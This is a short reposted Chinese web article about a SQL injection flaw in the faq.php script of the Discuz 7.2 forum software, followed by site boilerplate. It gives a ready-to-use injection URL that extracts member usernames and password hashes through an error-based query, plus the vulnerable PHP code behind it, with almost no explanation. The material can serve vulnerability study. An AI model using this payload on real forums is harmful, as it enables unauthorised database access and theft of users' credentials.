Discuz7.2版的faq.php SQL注入漏洞分析分享


注入代码实例:

代码如下:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

漏洞分析: by phithon

代码如下:
($action == ‘grouppermission’) {


        ksort($gids);
        $groupids = array();
        foreach($gids as $row) {
                $groupids[] = $row[0];
        }

        $query = $db->query(“SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (“.implodeids($groupids).”)”);

}
function implodeids($array) {
        if(!empty($array)) {
                return “‘”.implode(“‘,'”, is_array($array) ? $array : array($array)).”‘”;
        } else {
                return ”;
        }
}

  • —-想了解更多的数据库相关异常处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

    本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

    ctvol管理联系方式QQ:251552304

    本文章地址:https://www.ctvol.com/dtteaching/82855.html

    (0)
    上一篇 2020年4月22日
    下一篇 2020年4月22日

    精彩推荐